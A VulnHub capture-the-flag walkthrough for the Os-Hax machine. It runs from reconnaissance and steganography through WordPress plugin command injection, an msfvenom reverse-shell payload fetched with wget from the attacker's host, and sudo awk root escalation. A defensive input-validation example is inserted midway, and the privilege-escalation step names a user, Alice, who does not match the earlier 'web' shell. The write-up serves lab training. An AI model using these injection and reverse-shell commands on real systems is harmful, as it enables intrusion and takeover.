Os-Hax Walkthrough vulnhub CTF

Today we are solving Os-Hax, a VulnHub CTF designed by Rahul Gehlaut.
You can download it here. (Os-Hax Walkthrough)

Level: Intermediate

Boot to Root

Tools Used

  •  Netdiscover
  •  Dirb
  •  Nmap
  •  ExifTool
  •  Metasploit

First, find the target's IP address. We did this using the Netdiscover command.

Next, we continue to our second step: scanning the target with an Nmap aggressive scan.

nmap -A 192.168.1.31

We found ports 22 and 80 (HTTP) open.

Enter the machine's IP in the web browser.

Without wasting time, enumerate the directories with Dirb.

dirb http://192.168.1.31

We found some directories. Navigate to the following URL:

http://192.168.1.31/img

And we find our first flag.

Now download the image file flaghost.png.

Data Exfiltration-Steganography

After downloading the image, extract the data embedded in it.

This reveals the next hint: a directory named [email protected]

Opening the directory, we find Flag2.txt.

Open the file Flag2.txt.

It contains Brainfuck-encoded text.

After decoding the code, we find a WordPress password.

Decoder website: https://www.splitbrain.org/_static/ook/

Username: web

Password: [email protected]

The next step is to add an entry to the hosts file.

vi /etc/hosts

After adding my CTF IP and localhost, save the file.

Then open the following URL to find a WordPress page:

http://localhost/wordpress

Without wasting time, open the WordPress login panel:

http://localhost/wordpress/wp-login.php

Log in with the password found earlier.

After logging in to WordPress, we find a vulnerable plugin, Activity Manager.

Opening the Activity Manager tool, we find a command injection.

Let's test it with a command:

127.0.0.1 |id

This works: after submitting the command, I see its output.

Having confirmed that the command injection works, we create our payload with Metasploit:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw

Open the vi editor and save the output as payload.php.

Create a Python server:

python -m SimpleHTTPServer

Use the wget command to download our payload to the target machine.

First, use Inspect Element to change the input field's maxlength from 15 to 100.

127.0.0.1 | wget http://192.168.1.2:8000/payload.php

Execute our payload with this command:

127.0.0.1 | php payload.php
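A defender's view of the input field used above, as an added example that is not part of the original walkthrough or the plugin's code. It contrasts pasting the field into a shell string with server-side validation; the lookup binary, constants and function names are hypothetical, since the page does not show what command the plugin runs.

```python
import ipaddress
import shlex

LOOKUP_BIN = "/usr/bin/dig"  # assumption: stand-in for whatever tool the plugin runs
MAX_LEN = 15                 # the form's maxlength, also the longest dotted quad

def shell_view(user_input):
    """Vulnerable pattern: the field is pasted into a shell command string.
    Returns the tokens a POSIX shell would see (nothing is executed)."""
    cmd = LOOKUP_BIN + " -x " + user_input
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))

def shell_operators(user_input):
    """Control operators the shell would act on in the vulnerable pattern."""
    return [t for t in shell_view(user_input) if t[0] in "();<>|&"]

def safe_argv(user_input):
    """Hardened pattern: enforce the limit server-side, parse as IPv4, and
    return an argument vector for subprocess.run(argv) with no shell."""
    if len(user_input) > MAX_LEN:
        raise ValueError("input longer than %d characters" % MAX_LEN)
    addr = ipaddress.IPv4Address(user_input)  # ValueError on anything else
    return [LOOKUP_BIN, "-x", str(addr)]

def check(user_input):
    """Return (accepted, detail) for one submitted value."""
    try:
        return True, safe_argv(user_input)
    except ValueError as exc:
        return False, str(exc)

if __name__ == "__main__":
    # Constructed samples: a normal value and the two inputs from the walkthrough.
    samples = [
        "127.0.0.1",
        "127.0.0.1 |id",
        "127.0.0.1 | wget http://192.168.1.2:8000/payload.php",
    ]
    for sample in samples:
        print(repr(sample), shell_operators(sample), check(sample))
```

The second sample is only 13 characters long, so a length limit alone, whether in the browser or on the server, would not have stopped it; the IPv4 parse is what rejects it.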

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 4545
run

And we got a reverse connection.

First, use Python to spawn a proper shell:

python -c 'import pty;pty.spawn("/bin/bash")'

cd /home
ls
cd web
ls

And I see our third flag.

cat flag.txt

Privilege Escalation

To find the 4th flag we need to escalate to root privileges. Let's identify the sudo rights for Alice with the following command.

sudo -l

Here Alice can run awk as root without a password, and we can easily spawn a root shell by exploiting this permission.

sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}'
id
cd /root
ls
cat final.txt

FLAG 4: COMPLETE! Congratulations

Author Name: Rahul Gehlaut